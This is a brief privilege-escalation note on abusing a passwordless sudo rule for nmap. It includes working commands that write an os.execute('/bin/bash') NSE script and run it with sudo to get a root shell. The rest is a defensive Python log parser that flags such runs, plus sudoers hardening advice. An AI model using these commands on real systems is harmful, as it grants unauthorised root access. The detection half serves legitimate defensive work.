Sudo nmap NSE Privesc
When sudo allows running nmap as root without a password (check with sudo -l):
sudo -l
# (ALL) NOPASSWD: /usr/bin/nmap
Drop a malicious NSE script
echo "os.execute('/bin/bash')" >> /var/tmp/offsec.nse
cat /var/tmp/offsec.nse
sudo /usr/bin/nmap --script=/var/tmp/offsec.nse
Alternative one-liner:
echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse
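From the defender's side, the tell is a sudo invocation of nmap that loads an NSE script from somewhere other than nmap's own script library. The following is an added example, not part of the original note: it parses sudo log lines in the usual auth.log format and flags root-level nmap runs whose --script argument is an absolute path outside the library directory. The log lines are constructed, and the trusted directory /usr/share/nmap/scripts/ is an assumption that varies by distribution.

```python
import os
import re
from typing import Dict, List

# Constructed sample auth.log lines (not from the original page): one normal
# privileged scan, two scripts loaded from world-writable paths, one library script.
SAMPLE_LOG = """\
Mar  3 10:01:12 host sudo:   alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/nmap -sS 10.0.0.0/24
Mar  3 10:02:40 host sudo:   alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/nmap --script=/var/tmp/offsec.nse
Mar  3 10:03:05 host sudo:     bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/nmap --script /tmp/root.nse
Mar  3 10:04:00 host sudo:   carol : TTY=pts/2 ; PWD=/home/carol ; USER=root ; COMMAND=/usr/bin/nmap --script=http-title 10.0.0.5
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# Assumed NSE library location; a script loaded from anywhere else under sudo is suspect.
TRUSTED_SCRIPT_DIR = "/usr/share/nmap/scripts/"


def find_nse_script_abuse(log_text: str) -> List[Dict[str, str]]:
    """Return sudo nmap runs as root that load an NSE script from outside the library."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m.group("runas") != "root":
            continue
        argv = m.group("cmd").split()
        if not argv or os.path.basename(argv[0]) != "nmap":
            continue
        i = 1
        while i < len(argv):
            arg = argv[i]
            if arg.startswith("--script="):          # --script=a,b,c form
                spec = arg[len("--script="):]
            elif arg == "--script" and i + 1 < len(argv):  # --script <spec> form
                i += 1
                spec = argv[i]
            else:
                i += 1
                continue
            for script in spec.split(","):
                # Named scripts (e.g. http-title) resolve inside the library;
                # only explicit paths outside it are reported.
                if script.startswith("/") and not script.startswith(TRUSTED_SCRIPT_DIR):
                    findings.append({"user": m.group("user"), "script": script, "line": line})
            i += 1
    return findings
```

The same check maps onto a sudoers review: an `(ALL) NOPASSWD: /usr/bin/nmap` entry is effectively root for that user, so either remove it or restrict the allowed arguments.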